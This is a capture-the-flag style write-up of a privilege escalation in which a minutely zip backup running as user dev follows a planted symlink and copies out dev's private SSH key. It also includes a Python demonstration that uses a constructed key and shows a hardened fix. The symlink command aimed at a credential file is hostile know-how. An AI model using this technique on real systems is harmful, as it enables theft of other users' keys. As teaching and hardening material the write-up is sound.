
Symlinks

After getting a foothold as www-data, we find a large number of zip files in /var/www. Their timestamps are spaced regularly, which suggests that some background process is creating them rather than a person.

Moreover, the zip files are owned by the user dev.


Services

Something must be creating these zip files. Some basic enumeration with linpeas turns up an interesting systemd timer and the service it triggers:

www-data@<hostname>:/etc/systemd/system$ cat website_backup.timer
[Unit]
Description=Regularly backup the website as long as it is still under development

[Timer]
OnCalendar=minutely

[Install]
WantedBy=multi-user.target

www-data@<hostname>:/etc/systemd/system$ cat website_backup.service
[Unit]
Description=Backup and rotate website

[Service]
User=dev
Group=www-data
ExecStart=/usr/bin/webbackup

[Install]
WantedBy=multi-user.target

The timer fires every minute and runs /usr/bin/webbackup as the user dev (with group www-data). Looking at what exactly is being run:

/usr/bin/webbackup
#!/bin/bash
set -euf -o pipefail

cd /var/www/

SRC=/var/www/html
DST="/var/www/$(date +%Y-%m-%d_%H-%M-%S)-html.zip"

/usr/bin/rm --force -- "$DST"
/usr/bin/zip --recurse-paths "$DST" "$SRC"

KEEP=10
/usr/bin/find /var/www/ -maxdepth 1 -name '*.zip' -print0 \
    | sort --zero-terminated --numeric-sort --reverse \
    | while IFS= read -r -d '' backup; do
        if [ "$KEEP" -le 0 ]; then
            /usr/bin/rm --force -- "$backup"
        fi
        KEEP="$((KEEP-1))"
    done

User.txt

So this is a backup service built on zip, and zip follows symbolic links by default: unless it is invoked with -y/--symlinks, it opens the link's target and stores that file's contents under the link's own path. The service runs as dev, but /var/www/html is writable by www-data, so a symlink planted there pointing at a file only dev can read ends up in the next archive as a full copy of that file. This is a well-known pattern and gives us arbitrary file read as dev, one file per symlink.

> ln -s /home/dev/.ssh/id_rsa /var/www/html/assets/img/id

After waiting for the next backup run the following minute, we unzip the newest archive and pull out the entry at the symlink's path, which is now the contents of dev's id_rsa. With the key file set to owner-only permissions, we can SSH in as dev and read user.txt.
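To make the symlink-following behaviour concrete without the box at hand, here is an added example (not code from the machine or its author) that models the webbackup problem with Python's zipfile module, whose ZipFile.write() dereferences symlinks just like Info-ZIP zip without -y. The temp directory, the constructed key text and the paths that stand in for /home/dev/.ssh/id_rsa and /var/www/html are all assumptions; the uid boundary between www-data and dev is not reproduced, since the point here is only what ends up in the archive. The hardened variant mirrors zip --symlinks and stores the link itself.

```python
"""Added example, not code from the box: models the webbackup symlink issue.

ZipFile.write() opens the path it is given, so, like Info-ZIP `zip` without
-y/--symlinks, a symlink is stored as an ordinary file holding the *target's*
bytes.  Assumed fixture (a temp dir stands in for the host):
  <tmp>/id_rsa     stands in for /home/dev/.ssh/id_rsa
  <tmp>/html/...   stands in for /var/www/html, writable by www-data
"""
import os
import stat
import tempfile
import zipfile

# Constructed sample, not a real key.
CONSTRUCTED_KEY = (
    "-----BEGIN OPENSSH PRIVATE KEY-----\n"
    "CONSTRUCTED-SAMPLE\n"
    "-----END OPENSSH PRIVATE KEY-----\n"
)


def backup_follow_symlinks(src: str, dst: str) -> None:
    """Naive backup, equivalent to `zip --recurse-paths DST SRC`.
    Every file under src goes through ZipFile.write(), which dereferences
    symlinks, so whatever a link points at is copied into the archive."""
    with zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zf:
        for root, _dirs, files in os.walk(src):
            for name in files:
                path = os.path.join(root, name)
                # zip stores absolute paths with the leading '/' stripped
                zf.write(path, arcname=path.lstrip("/"))


def backup_keep_symlinks(src: str, dst: str) -> None:
    """Hardened backup, equivalent to `zip --recurse-paths --symlinks DST SRC`:
    a symlink becomes a link entry whose data is the target *path*, never the
    target's contents, so it cannot be used to read files the planter cannot."""
    with zipfile.ZipFile(dst, "w", zipfile.ZIP_DEFLATED) as zf:
        for root, _dirs, files in os.walk(src):
            for name in files:
                path = os.path.join(root, name)
                arcname = path.lstrip("/")
                if os.path.islink(path):
                    info = zipfile.ZipInfo(arcname)
                    info.create_system = 3                      # Unix host
                    info.external_attr = (stat.S_IFLNK | 0o777) << 16
                    zf.writestr(info, os.readlink(path))
                else:
                    zf.write(path, arcname=arcname)


def member_is_symlink(zf: zipfile.ZipFile, name: str) -> bool:
    """True if the archive entry carries Unix symlink mode bits."""
    mode = zf.getinfo(name).external_attr >> 16
    return stat.S_ISLNK(mode)


def run_demo() -> dict:
    """Plant the symlink, run both backups, then read the planted entry back
    (the equivalent of `unzip -p ARCHIVE MEMBER`)."""
    with tempfile.TemporaryDirectory() as tmp:
        secret = os.path.join(tmp, "id_rsa")          # /home/dev/.ssh/id_rsa
        with open(secret, "w") as fh:
            fh.write(CONSTRUCTED_KEY)

        webroot = os.path.join(tmp, "html")           # /var/www/html
        img_dir = os.path.join(webroot, "assets", "img")
        os.makedirs(img_dir)
        link = os.path.join(img_dir, "id")
        os.symlink(secret, link)   # ln -s /home/dev/.ssh/id_rsa .../assets/img/id
        member = link.lstrip("/")  # path of the link as it appears in the archive

        naive_zip = os.path.join(tmp, "naive-html.zip")
        backup_follow_symlinks(webroot, naive_zip)
        with zipfile.ZipFile(naive_zip) as zf:
            leaked = zf.read(member).decode()
            naive_is_link = member_is_symlink(zf, member)

        hardened_zip = os.path.join(tmp, "hardened-html.zip")
        backup_keep_symlinks(webroot, hardened_zip)
        with zipfile.ZipFile(hardened_zip) as zf:
            stored = zf.read(member).decode()
            hardened_is_link = member_is_symlink(zf, member)

        return {
            "secret_path": secret,
            "leaked": leaked,                   # full key text from the naive backup
            "naive_is_link": naive_is_link,     # False: stored as a regular file
            "stored": stored,                   # hardened backup: only the link target path
            "hardened_is_link": hardened_is_link,
        }


if __name__ == "__main__":
    r = run_demo()
    print("naive backup leaked the key:", r["leaked"] == CONSTRUCTED_KEY)
    print("hardened backup stored a link to:", r["stored"])
```

The fix the script's author would want is the same as in the model: pass --symlinks (-y) to zip, or better, run the backup as a user that cannot read anything the web user should not see. Note that the member path inside the archive is the symlink's own path with the leading slash removed, which is how you locate the leaked file when unzipping.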
